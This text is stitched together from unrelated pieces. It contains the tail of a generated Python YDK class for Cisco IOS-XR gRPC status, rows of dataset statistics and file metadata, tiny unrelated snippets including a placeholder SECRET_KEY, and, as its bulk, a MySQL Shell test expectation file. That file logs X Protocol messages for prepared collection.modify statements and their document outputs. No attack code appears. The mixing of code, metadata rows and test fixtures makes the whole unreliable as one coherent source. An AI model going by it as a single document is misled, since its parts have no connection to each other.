**range:** 0..18446744073709551615
.. attribute:: ct_replace_config_res_sent
CounterReplaceConfigSent
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_show_cmd_txt_req_recv
CounterShowCmdTxtReqRecv
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_show_cmd_txt_res_sent
CounterShowCmdTxtResSent
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: listening_port
ListeningPort
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: max_req_per_user
MaxReqPerUser
**type**\: int
**range:** 0..4294967295
.. attribute:: max_req_total
MaxReqTotal
**type**\: int
**range:** 0..4294967295
.. attribute:: tls
GRPCTLS
**type**\: str
.. attribute:: transport
GRPCTransport
**type**\: str
.. attribute:: trustpoint
GRPCTrustpoint
**type**\: str
"""
_prefix = 'man-ems-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.address_family = None
self.ct_cli_config_req_recv = None
self.ct_cli_config_res_sent = None
self.ct_commit_replace_req_recv = None
self.ct_commit_replace_res_sent = None
self.ct_delete_config_req_recv = None
self.ct_delete_config_res_sent = None
self.ct_get_config_req_recv = None
self.ct_get_config_res_sent = None
self.ct_get_current_session = None
self.ct_get_oper_req_recv = None
self.ct_get_oper_res_sent = None
self.ct_merge_config_req_recv = None
self.ct_merge_config_res_sent = None
self.ct_replace_config_req_recv = None
self.ct_replace_config_res_sent = None
self.ct_show_cmd_txt_req_recv = None
self.ct_show_cmd_txt_res_sent = None
self.listening_port = None
self.max_req_per_user = None
self.max_req_total = None
self.tls = None
self.transport = None
self.trustpoint = None
@property
def _common_path(self):
return '/Cisco-IOS-XR-man-ems-oper:grpc/Cisco-IOS-XR-man-ems-oper:status'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.address_family is not None:
return True
if self.ct_cli_config_req_recv is not None:
return True
if self.ct_cli_config_res_sent is not None:
return True
if self.ct_commit_replace_req_recv is not None:
return True
if self.ct_commit_replace_res_sent is not None:
return True
if self.ct_delete_config_req_recv is not None:
return True
if self.ct_delete_config_res_sent is not None:
return True
if self.ct_get_config_req_recv is not None:
return True
if self.ct_get_config_res_sent is not None:
return True
if self.ct_get_current_session is not None:
return True
if self.ct_get_oper_req_recv is not None:
return True
if self.ct_get_oper_res_sent is not None:
return True
if self.ct_merge_config_req_recv is not None:
return True
if self.ct_merge_config_res_sent is not None:
return True
if self.ct_replace_config_req_recv is not None:
return True
if self.ct_replace_config_res_sent is not None:
return True
if self.ct_show_cmd_txt_req_recv is not None:
return True
if self.ct_show_cmd_txt_res_sent is not None:
return True
if self.listening_port is not None:
return True
if self.max_req_per_user is not None:
return True
if self.max_req_total is not None:
return True
if self.tls is not None:
return True
if self.transport is not None:
return True
if self.trustpoint is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_ems_oper as meta
return meta._meta_table['Grpc.Status']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-man-ems-oper:grpc'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.statistics is not None and self.statistics._has_data():
return True
if self.status is not None and self.status._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_ems_oper as meta
return meta._meta_table['Grpc']['meta_info']
| 26.14826
| 108
| 0.536276
| 1,778
| 17,284
| 4.899888
| 0.082677
| 0.046832
| 0.051653
| 0.082645
| 0.913338
| 0.907828
| 0.905533
| 0.905533
| 0.905533
| 0.905533
| 0
| 0.076981
| 0.389725
| 17,284
| 660
| 109
| 26.187879
| 0.748957
| 0.399387
| 0
| 0.904762
| 0
| 0.009524
| 0.033233
| 0.01894
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.038095
| 0.014286
| 0.442857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bb385feb2f9abed63283b6f9dfbfb95aefa543de
| 11
|
py
|
Python
|
test/compiler/case/assign-multi-input.py
|
xupingmao/minipy
|
5bce2f238925eb92fe9ff7d935f59ef68daa257a
|
[
"MIT"
] | 52
|
2016-07-11T10:14:35.000Z
|
2021-12-09T09:10:43.000Z
|
test/compiler/case/assign-multi-input.py
|
xupingmao/snake
|
c956f151ed1ebd2faeaf1565352b59ca5a8fa0b4
|
[
"MIT"
] | 13
|
2016-07-24T13:50:37.000Z
|
2019-03-02T06:56:18.000Z
|
test/compiler/case/assign-multi-input.py
|
xupingmao/snake
|
c956f151ed1ebd2faeaf1565352b59ca5a8fa0b4
|
[
"MIT"
] | 9
|
2017-01-27T10:46:04.000Z
|
2021-12-09T09:10:46.000Z
|
a,b,c=1,2,3
| 11
| 11
| 0.545455
| 6
| 11
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.272727
| 0
| 11
| 1
| 11
| 11
| 0.272727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
247ad4138699df922d3bbdb975ad63b2a82f6d76
| 66
|
py
|
Python
|
release/1.9/project/defaults.py
|
fmierlo/django-default-settings
|
6e3c506b6cde60fcbea1ac5cb33a69a500416b45
|
[
"BSD-3-Clause"
] | null | null | null |
release/1.9/project/defaults.py
|
fmierlo/django-default-settings
|
6e3c506b6cde60fcbea1ac5cb33a69a500416b45
|
[
"BSD-3-Clause"
] | null | null | null |
release/1.9/project/defaults.py
|
fmierlo/django-default-settings
|
6e3c506b6cde60fcbea1ac5cb33a69a500416b45
|
[
"BSD-3-Clause"
] | null | null | null |
SECRET_KEY = '01234567890123456789012345678901234567890123456789'
| 33
| 65
| 0.909091
| 3
| 66
| 19.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.793651
| 0.045455
| 66
| 1
| 66
| 66
| 0.142857
| 0
| 0
| 0
| 0
| 0
| 0.757576
| 0.757576
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
24ae5cc2225d151e21983d629ea7efc60b6c3466
| 62,331
|
py
|
Python
|
unittest/scripts/py_devapi/validation/mysqlx_collection_modify_prepared.py
|
mueller/mysql-shell
|
29bafc5692bd536a12c4e41c54cb587375fe52cf
|
[
"Apache-2.0"
] | 119
|
2016-04-14T14:16:22.000Z
|
2022-03-08T20:24:38.000Z
|
unittest/scripts/py_devapi/validation/mysqlx_collection_modify_prepared.py
|
mueller/mysql-shell
|
29bafc5692bd536a12c4e41c54cb587375fe52cf
|
[
"Apache-2.0"
] | 9
|
2017-04-26T20:48:42.000Z
|
2021-09-07T01:52:44.000Z
|
unittest/scripts/py_devapi/validation/mysqlx_collection_modify_prepared.py
|
mueller/mysql-shell
|
29bafc5692bd536a12c4e41c54cb587375fe52cf
|
[
"Apache-2.0"
] | 51
|
2016-07-20T05:06:48.000Z
|
2022-03-09T01:20:53.000Z
|
#@<PROTOCOL> First execution is normal
>>>> SEND Mysqlx.Crud.Update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
}
#@<OUT> First execution is normal
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"age": 18,
"name": "george",
"grade": 1
}
{
"_id": "002",
"age": 17,
"name": "james",
"grade": 1
}
{
"_id": "003",
"age": 18,
"name": "luke",
"grade": 1
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> Second execution prepares statement and executes it
>>>> SEND Mysqlx.Prepare.Prepare {
stmt_id: 1
stmt {
type: UPDATE
update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 1
}
#@<OUT> Second execution prepares statement and executes it
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"age": 18,
"name": "george",
"grade": 1
}
{
"_id": "002",
"age": 17,
"name": "james",
"grade": 1
}
{
"_id": "003",
"age": 18,
"name": "luke",
"grade": 1
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> Third execution uses prepared statement
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 1
}
#@<OUT> Third execution uses prepared statement
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"age": 18,
"name": "george",
"grade": 1
}
{
"_id": "002",
"age": 17,
"name": "james",
"grade": 1
}
{
"_id": "003",
"age": 18,
"name": "luke",
"grade": 1
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> set() changes statement, back to normal execution
>>>> SEND Mysqlx.Prepare.Deallocate {
stmt_id: 1
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Crud.Update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
}
#@<OUT> set() changes statement, back to normal execution
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"age": 18,
"name": "george",
"grade": 1,
"group": "A"
}
{
"_id": "002",
"age": 17,
"name": "james",
"grade": 1,
"group": "A"
}
{
"_id": "003",
"age": 18,
"name": "luke",
"grade": 1,
"group": "A"
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> second execution after set(), prepares statement and executes it
>>>> SEND Mysqlx.Prepare.Prepare {
stmt_id: 2
stmt {
type: UPDATE
update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 2
}
#@<OUT> second execution after set(), prepares statement and executes it
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"age": 18,
"name": "george",
"grade": 1,
"group": "A"
}
{
"_id": "002",
"age": 17,
"name": "james",
"grade": 1,
"group": "A"
}
{
"_id": "003",
"age": 18,
"name": "luke",
"grade": 1,
"group": "A"
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> third execution after set(), uses prepared statement
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 2
}
#@<OUT> third execution after set(), uses prepared statement
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"age": 18,
"name": "george",
"grade": 1,
"group": "A"
}
{
"_id": "002",
"age": 17,
"name": "james",
"grade": 1,
"group": "A"
}
{
"_id": "003",
"age": 18,
"name": "luke",
"grade": 1,
"group": "A"
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> unset() changes statement, back to normal execution
>>>> SEND Mysqlx.Prepare.Deallocate {
stmt_id: 2
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Crud.Update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_REMOVE
}
}
#@<OUT> unset() changes statement, back to normal execution
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A"
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A"
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A"
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> second execution after unset(), prepares statement and executes it
>>>> SEND Mysqlx.Prepare.Prepare {
stmt_id: 3
stmt {
type: UPDATE
update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_REMOVE
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 3
}
#@<OUT> second execution after unset(), prepares statement and executes it
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A"
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A"
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A"
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> third execution after unset(), uses prepared statement
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 3
}
#@<OUT> third execution after unset(), uses prepared statement
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A"
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A"
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A"
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> patch() changes statement, back to normal execution
>>>> SEND Mysqlx.Prepare.Deallocate {
stmt_id: 3
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Crud.Update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_REMOVE
}
operation {
source {
}
operation: MERGE_PATCH
value {
type: OBJECT
object {
fld {
key: "grades"
value {
type: ARRAY
array {
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "B"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "C"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "D"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "E"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "F"
}
}
}
}
}
}
}
}
}
}
#@<OUT> patch() changes statement, back to normal execution
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A",
"grades": [
"A",
"B",
"C",
"D",
"E",
"F"
]
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"B",
"C",
"D",
"E",
"F"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"B",
"C",
"D",
"E",
"F"
]
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> second execution after patch(), prepares statement and executes it
>>>> SEND Mysqlx.Prepare.Prepare {
stmt_id: 4
stmt {
type: UPDATE
update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_REMOVE
}
operation {
source {
}
operation: MERGE_PATCH
value {
type: OBJECT
object {
fld {
key: "grades"
value {
type: ARRAY
array {
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "B"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "C"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "D"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "E"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "F"
}
}
}
}
}
}
}
}
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 4
}
#@<OUT> second execution after patch(), prepares statement and executes it
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A",
"grades": [
"A",
"B",
"C",
"D",
"E",
"F"
]
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"B",
"C",
"D",
"E",
"F"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"B",
"C",
"D",
"E",
"F"
]
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> third execution after patch(), uses prepared statement
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 4
}
#@<OUT> third execution after patch(), uses prepared statement
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A",
"grades": [
"A",
"B",
"C",
"D",
"E",
"F"
]
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"B",
"C",
"D",
"E",
"F"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"B",
"C",
"D",
"E",
"F"
]
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> array_insert() changes statement, back to normal execution
>>>> SEND Mysqlx.Prepare.Deallocate {
stmt_id: 4
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Crud.Update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_REMOVE
}
operation {
source {
}
operation: MERGE_PATCH
value {
type: OBJECT
object {
fld {
key: "grades"
value {
type: ARRAY
array {
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "B"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "C"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "D"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "E"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "F"
}
}
}
}
}
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
document_path {
type: ARRAY_INDEX
index: 1
}
}
operation: ARRAY_INSERT
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A+"
}
}
}
}
}
#@<OUT> array_insert() changes statement, back to normal execution
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F"
]
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F"
]
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> second execution after array_insert(), prepares statement and executes it
>>>> SEND Mysqlx.Prepare.Prepare {
stmt_id: 5
stmt {
type: UPDATE
update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_REMOVE
}
operation {
source {
}
operation: MERGE_PATCH
value {
type: OBJECT
object {
fld {
key: "grades"
value {
type: ARRAY
array {
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "B"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "C"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "D"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "E"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "F"
}
}
}
}
}
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
document_path {
type: ARRAY_INDEX
index: 1
}
}
operation: ARRAY_INSERT
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A+"
}
}
}
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 5
}
#@<OUT> second execution after array_insert(), prepares statement and executes it
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F"
]
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F"
]
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> third execution after array_insert(), uses prepared statement
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 5
}
#@<OUT> third execution after array_insert(), uses prepared statement
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F"
]
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F"
]
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> array_append() changes statement, back to normal execution
>>>> SEND Mysqlx.Prepare.Deallocate {
stmt_id: 5
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Crud.Update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_REMOVE
}
operation {
source {
}
operation: MERGE_PATCH
value {
type: OBJECT
object {
fld {
key: "grades"
value {
type: ARRAY
array {
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "B"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "C"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "D"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "E"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "F"
}
}
}
}
}
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
document_path {
type: ARRAY_INDEX
index: 1
}
}
operation: ARRAY_INSERT
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A+"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
}
operation: ARRAY_APPEND
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "G"
}
}
}
}
}
#@<OUT> array_append() changes statement, back to normal execution
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
